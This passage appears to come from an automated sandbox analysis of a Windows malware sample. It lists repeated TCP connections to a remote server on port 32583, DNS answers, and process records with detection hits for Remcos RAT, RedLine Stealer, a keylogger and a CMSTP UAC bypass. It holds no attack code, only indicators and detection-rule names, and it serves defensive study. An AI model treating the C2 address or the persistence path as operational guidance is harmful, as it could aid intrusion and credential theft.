Jan 11, 2025 07:37:44.731898069 CET	50028	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:44.736718893 CET	32583	50028	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:45.755991936 CET	50029	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:45.760879040 CET	32583	50029	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:45.760984898 CET	50029	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:45.816813946 CET	50029	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:45.821598053 CET	32583	50029	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:47.342354059 CET	32583	50029	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:47.342437983 CET	50029	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:47.342683077 CET	50029	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:47.347522020 CET	32583	50029	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:48.356925011 CET	50030	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:48.362188101 CET	32583	50030	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:48.362298012 CET	50030	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:48.365760088 CET	50030	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:48.370588064 CET	32583	50030	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:49.956753016 CET	32583	50030	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:49.957005024 CET	50030	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:49.957914114 CET	50030	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:49.962770939 CET	32583	50030	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:50.966547966 CET	50031	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:50.971549988 CET	32583	50031	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:50.971714020 CET	50031	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:50.975044966 CET	50031	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:50.979846001 CET	32583	50031	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:52.560816050 CET	32583	50031	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:52.560890913 CET	50031	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:52.561033010 CET	50031	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:52.565850019 CET	32583	50031	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:53.575702906 CET	50032	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:53.580775976 CET	32583	50032	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:53.583986044 CET	50032	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:53.587336063 CET	50032	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:53.592293978 CET	32583	50032	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:55.173152924 CET	32583	50032	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:55.173240900 CET	50032	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:55.173830032 CET	50032	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:55.178586960 CET	32583	50032	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:56.402302980 CET	50033	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:56.407308102 CET	32583	50033	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:56.407434940 CET	50033	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:56.417985916 CET	50033	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:56.422950029 CET	32583	50033	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:57.984072924 CET	32583	50033	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:57.984143019 CET	50033	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:57.984287977 CET	50033	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:57.989070892 CET	32583	50033	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:59.593605995 CET	50034	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:59.598459005 CET	32583	50034	198.23.227.212	192.168.2.7
Jan 11, 2025 07:37:59.598537922 CET	50034	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:59.680738926 CET	50034	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:37:59.820729017 CET	32583	50034	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:01.192312956 CET	32583	50034	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:01.192449093 CET	50034	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:01.192640066 CET	50034	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:01.197438955 CET	32583	50034	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:02.200997114 CET	50035	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:02.206005096 CET	32583	50035	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:02.206070900 CET	50035	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:02.243016958 CET	50035	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:02.247975111 CET	32583	50035	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:03.780180931 CET	32583	50035	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:03.780308962 CET	50035	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:03.780395031 CET	50035	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:03.785262108 CET	32583	50035	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:04.731895924 CET	50036	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:04.737088919 CET	32583	50036	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:04.737200022 CET	50036	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:04.740637064 CET	50036	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:04.745465994 CET	32583	50036	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:06.315165997 CET	32583	50036	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:06.318099022 CET	50036	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:06.318169117 CET	50036	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:06.322925091 CET	32583	50036	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:07.232057095 CET	50037	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:07.236977100 CET	32583	50037	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:07.237080097 CET	50037	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:07.240475893 CET	50037	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:07.245297909 CET	32583	50037	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:08.792447090 CET	32583	50037	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:08.794035912 CET	50037	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:08.794137955 CET	50037	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:08.798903942 CET	32583	50037	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:09.687537909 CET	50038	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:09.692543030 CET	32583	50038	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:09.692625999 CET	50038	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:09.697467089 CET	50038	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:09.702332020 CET	32583	50038	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:11.263211012 CET	32583	50038	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:11.263284922 CET	50038	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:11.263462067 CET	50038	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:11.268291950 CET	32583	50038	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:12.125452042 CET	50039	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:12.130530119 CET	32583	50039	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:12.132616997 CET	50039	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:12.242619991 CET	50039	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:12.247633934 CET	32583	50039	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:13.722613096 CET	32583	50039	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:13.724260092 CET	50039	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:13.789886951 CET	50039	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:13.794855118 CET	32583	50039	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:14.622858047 CET	50040	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:14.627973080 CET	32583	50040	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:14.628067970 CET	50040	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:14.633099079 CET	50040	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:14.637945890 CET	32583	50040	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:16.200550079 CET	32583	50040	198.23.227.212	192.168.2.7
Jan 11, 2025 07:38:16.201139927 CET	50040	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:16.201242924 CET	50040	32583	192.168.2.7	198.23.227.212
Jan 11, 2025 07:38:16.206495047 CET	32583	50040	198.23.227.212	192.168.2.7

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 07:36:31.567262888 CET	1.1.1.1	192.168.2.7	0xf866	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:31.567262888 CET	1.1.1.1	192.168.2.7	0xf866	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.36	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.23	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.34	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.18	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.35	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.19	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.20	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:36:50.379412889 CET	1.1.1.1	192.168.2.7	0x651e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.39	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.37	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.38	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.43	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.24	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.22	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.36	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.22	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:37:16.997564077 CET	1.1.1.1	192.168.2.7	0x819b	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.27	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	01:36:09
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\2iH7rqx9rQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2iH7rqx9rQ.exe"
Imagebase:	0x400000
File size:	459'264 bytes
MD5 hash:	73666F4D35944F20B34C150B8D9DF538
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:36:13
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 928
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:36:14
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1080
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:36:15
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1120
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:36:16
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1128
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:36:17
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1140
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:36:20
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1152
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:36:21
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1180
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:36:23
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\xenor\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Imagebase:	0x400000
File size:	459'264 bytes
MD5 hash:	73666F4D35944F20B34C150B8D9DF538
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000017.00000002.2515260424.0000000000B7B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 76%, ReversingLabs Detection: 57%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	01:36:23
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\xenor\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Imagebase:	0x400000
File size:	459'264 bytes
MD5 hash:	73666F4D35944F20B34C150B8D9DF538
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.1779032032.0000000000A21000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 